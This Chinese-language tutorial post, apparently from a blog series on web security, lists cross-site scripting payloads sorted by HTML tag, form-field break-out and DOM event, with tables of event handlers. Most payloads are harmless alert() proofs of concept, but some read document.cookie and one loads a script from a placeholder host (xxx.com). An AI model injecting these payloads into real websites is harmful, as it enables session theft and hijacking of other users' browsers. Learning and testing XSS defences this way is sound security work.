五、web安全--XSS漏洞(2)--XSS相关payload

XSS 主要是针对网页客户端的一种攻击,那么就要执行 JavaScript 代码,那么无疑需要用到 JavaScript 语言以及在 HTML 中可以解析 JavaScript 代码的标签。

1、标签类

(1)script

复制代码
<script></script>标签是最直接的 xSS payload,标签可以在浏览器渲染 DOM 树的时候同步执行 Javascript 代码,他可以引用外部,也可以将代码插入标签内

<script>alert("xss")</script>
<script>alert(/xss/)</script>
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<script src=http://xxx.com/xss.js></script>

(2)svg

复制代码
<svg></svg>标签是标记定义 5VG 图形的容器,其在 onload 方法中是在 SVG 容器初始化的时候执行代码

<svg onload="alert(1)">

(3)img

<img />标签是加载图片资源的标签,其在无法加载图片资源的时候会执行 onerror 方法

复制代码
<img src=1 onerror=alert("/xss/")>
<img src=l onerror=alert(document.cookie)>
<img src="正确图片地址"onload="alert(/xss/)"/>

(4)body

<body></body> 是定义 HTML 文档的主体。其包含文档的所有内容(比如文本、超链接、图像、表格和列表等等。)

复制代码
<body onload=alert(/xss/)>
<body onpageshow=alert(1)>

(5)video

复制代码
<video></video>标签是引用远程媒体视频的标签,用法与 img 类似
<video onerror="alert(/xss/)" src="1"/>

(6)style

复制代码
<style></style>标签是加载 css 资源的标签

<style onload=alert(1)></style>

2、表单类

在 web 中,最常见的为表单了,表单中的标签有<input />、<textarea></textarea>等等 在这里更多的是闭合语句来构成 XSS 比如

复制代码
"/><script>alert(/xss/)</script>
></textareax<script>alert(/xss/)</script>

3、事件类

在 HTML 中,有许多事件操作的方法(DOM 事件),如 onclick 事件、ondblclick 事件等等,只需要用户点击,或者双击也可以执行 JavaScript 代码需要闭合,在块级元素中添加事件方法。

(1)鼠标事件

事件名称 描述 DOM
onclick 当用户点击某个对象时调用的事件句柄。 2
oncontextmenu 在用户点击鼠标右键打开上下文菜单时触发
ondblclick 当用户双击某个对象时调用的事件句柄。 2
onmousedown 鼠标按钮被按下。 2
onmouseenter 当鼠标指针移动到元素上时触发。 2
onmouseleave 当鼠标指针移出元素时触发 2
onmousemove 鼠标被移动。 2
onmouseout 鼠标从某元素移开。 2
onmouseover 鼠标移到某元素之上。 2
onmouseup 鼠标按键被松开。 2
onmousewheel 鼠标滚轮被滚动。 2

(2)键盘事件

事件名称 描述 DOM
onkeypress 某个键盘的键被按下并松开。 2
onkeydown 某个键盘的键被按下。 2
onkeyup 某个键盘的键被松开。 2

(3)框架/对象(Frame/Object)事件

事件名称 描述 DOM
onabort 图像的加载被中断。 ( ) 2
onbeforeunload 该事件在即将离开页面(刷新或关闭)时触发
onerror 在加载文档或图像时发生错误。 ( , 和 ) 2
onhashchange 该事件在当前 URL 的锚部分发生修改时触发。
onload 一张页面或一幅图像完成加载。
onpageshow 该事件在用户访问页面时触发 2
onpopstate 该事件在窗口历史记录改变时触发。
onresize 窗口或框架被重新调整大小。 2
onscroll 当文档被滚动时触发的事件。 2
onunload 用户退出页面。 ( ) 2

等,详见链接https://www.runoob.com/jsref/dom-obj-event.html

相关推荐
安全系统学习7 小时前
【网络安全】Mysql注入中锁机制
安全·web安全·网络安全·渗透测试·xss
深圳安锐科技有限公司10 小时前
深圳安锐科技发布国内首款4G 索力仪!让斜拉桥索力自动化监测更精准高效
运维·安全·自动化·自动化监测·人工监测·桥梁监测·索力监测
潘锦11 小时前
海量「免费」的 OPENAI KEY,你敢用吗?
安全·openai
冰橙子id11 小时前
linux系统安全
linux·安全·系统安全
上海锝秉工控12 小时前
防爆拉线位移传感器:工业安全的“隐形守护者”
大数据·人工智能·安全
你不知道我是谁?14 小时前
AI 应用于进攻性安全
人工智能·安全
薄荷椰果抹茶15 小时前
【网络安全基础】第一章---引言
安全·网络安全
zskj_zhyl16 小时前
智绅科技:以科技为翼,构建养老安全守护网
人工智能·科技·安全
zsq16 小时前
【网络与系统安全】域类实施模型DTE
网络·安全·系统安全
vvilkim17 小时前
Electron 安全最佳实践:构建安全的桌面应用
javascript·安全·electron